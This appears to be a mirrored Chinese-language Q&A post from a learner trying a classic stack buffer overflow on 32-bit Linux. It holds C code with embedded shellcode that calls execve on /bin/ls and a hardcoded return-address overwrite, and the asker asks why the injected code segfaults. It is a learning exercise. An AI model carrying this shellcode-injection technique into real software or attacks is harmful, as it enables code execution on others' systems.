【发布时间】:2013-11-18 18:17:41
【问题描述】:
我试图在以下非常简单的程序中导致缓冲区溢出:
#include <stdio.h>
#include <stdint.h>
void badf(int n, char c, char* buffer)
{
char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff,
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c,
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes
// Overwrite Base Pointer
//mycode[37] = 0x29;
//mycode[38] = 0xf4;
//mycode[39] = 0xff;
//mycode[40] = 0xbf;
// Overwrite Instruction Pointer
// Using debugger, found mycode[] to be loaded in: 0xbffff42d
mycode[41] = 0x2d;
mycode[42] = 0xf4;
mycode[43] = 0xff;
mycode[44] = 0xbf;
}
void f(int n, char c)
{
char buffer[37];
badf(n,c,buffer);
}
void test()
{
printf("test");
}
int main()
{
f(37,0x00);
return 0;
}
(我之前已经成功地从缓冲区溢出中执行test())现在我试图通过用堆栈中mycode的开头覆盖指令指针来执行mycode[]。
这只工作了一半,程序跳转到正确的地址,在那里我可以在调试器中看到正确的机器代码,但随后由于分段错误而崩溃,而不是执行以下指令(见屏幕截图)。
我试图弄清楚他为什么在执行“注入”代码的内容之前崩溃。我对这类东西比较陌生,我理解分段错误意味着我试图访问操作系统不希望我访问的内存?
(PS:32位Linux机器,用-fno-stack-protector编译所以我可以玩这个东西)
(如果需要更多信息,我很乐意更新帖子)
【问题讨论】:
-
您的问题解决了吗?我有同样的问题
标签: c linux assembly x86 buffer-overflow